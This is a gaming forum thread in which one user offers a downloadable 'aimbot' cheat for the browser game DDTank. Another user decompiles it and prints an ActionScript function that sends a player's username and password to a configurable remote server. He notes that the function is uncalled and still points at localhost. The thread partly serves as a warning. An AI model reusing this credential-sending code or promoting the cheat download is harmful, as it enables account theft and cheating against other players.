DDTank
http://www.kongregate.com/games/DDTankTeam/ddtank
new hack please (broken image removed)
-migrated-
6 posts
http://www.kongregate.com/games/DDTankTeam/ddtank
new hack please (broken image removed)
It's a heavily server-sided MMO (probably manned in the depths of Asia), which at a glance seems much more intricate than something like, Swords & Potions. Swords & Potions needs the attention because there's a huge badge discrepancy.
It's really not a bad game, especially if you like Worms or Tanks. About 3 minutes into the game, you're already lvl5, so it should only take about 40 minutes of actual playtime to reach lvl10.
Don't download this file
~KongregateHack
http://dl.dropbox.com/u/4910378/DDTAimbot2.6.rar
This is like aimbot. It shows the trajectory and the needed strength to shoot
Its not .exe file so u can be sure its no virus.
http://www.youtube.com/watch?v=rz8aelwVFPQ
Follow the signs you are given and you will be loved and guided to best of your destiny.
http://dl.dropbox.com/u/4910378/DDTAimbot2.6.rar
This is like aimbot. It shows the trajectory and the needed strength to shoot
Its not .exe file so u can be sure its no virus.
http://www.youtube.com/watch?v=rz8aelwVFPQ
You forgot to change the server variable to your domain. Otherwise, you're gonna have a hard time stealing anyone's login information.
If that wasn't your intention I apologize. But you're gonna have a hard time explaining this little piece of code.
private function tryLogin(arg1:String, arg2:String):void
{
var loc1:*;
loc1 = new flash.net.URLLoader();
loc1.dataFormat = flash.net.URLLoaderDataFormat.VARIABLES;
var loc2:*;
(loc2 = new flash.net.URLRequest("http://" + this.server + "/ddtAimbot/request.php")).method = flash.net.URLRequestMethod.GET;
var loc3:*;
(loc3 = new flash.net.URLVariables()).username = arg1;
loc3.password = arg2;
loc2.data = loc3;
loc1.addEventListener(flash.events.Event.COMPLETE, this.loginResponse);
loc1.addEventListener(flash.events.HTTPStatusEvent.HTTP_STATUS, this.responseError);
loc1.addEventListener(flash.events.IOErrorEvent.IO_ERROR, this.responseError);
loc1.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERROR, this.responseError);
loc1.load(loc2);
return;
}
private var server:String="localhost:8080";
Edit: you don't call the function anywhere. I guess you weren't planning on implementing this, err, feature just yet.
Edit2: it was also leeched from this blog. It should be safe to use, but I may have missed something so use it at your own risk.
Quote from: "feLoNy"http://dl.dropbox.com/u/4910378/DDTAimbot2.6.rarYou forgot to change the server variable to your domain. Otherwise, you're gonna have a hard time stealing anyone's login information.
This is like aimbot. It shows the trajectory and the needed strength to shoot
Its not .exe file so u can be sure its no virus.
http://www.youtube.com/watch?v=rz8aelwVFPQ
If that wasn't your intention I apologize. But you're gonna have a hard time explaining this little piece of code.Code: [Select]private function tryLogin(arg1:String, arg2:String):void
{
var loc1:*;
loc1 = new flash.net.URLLoader();
loc1.dataFormat = flash.net.URLLoaderDataFormat.VARIABLES;
var loc2:*;
(loc2 = new flash.net.URLRequest("http://" + this.server + "/ddtAimbot/request.php")).method = flash.net.URLRequestMethod.GET;
var loc3:*;
(loc3 = new flash.net.URLVariables()).username = arg1;
loc3.password = arg2;
loc2.data = loc3;
loc1.addEventListener(flash.events.Event.COMPLETE, this.loginResponse);
loc1.addEventListener(flash.events.HTTPStatusEvent.HTTP_STATUS, this.responseError);
loc1.addEventListener(flash.events.IOErrorEvent.IO_ERROR, this.responseError);
loc1.addEventListener(flash.events.SecurityErrorEvent.SECURITY_ERROR, this.responseError);
loc1.load(loc2);
return;
}Code: [Select]private var server:String="localhost:8080";
Edit: you don't call the function anywhere. I guess you weren't planning on implementing this, err, feature just yet.
Edit2: it was also leeched from this blog. It should be safe to use, but I may have missed something so use it at your own risk.
I don't think it (the "hack") works, and if it does, I don't get it, but you might be onto something..
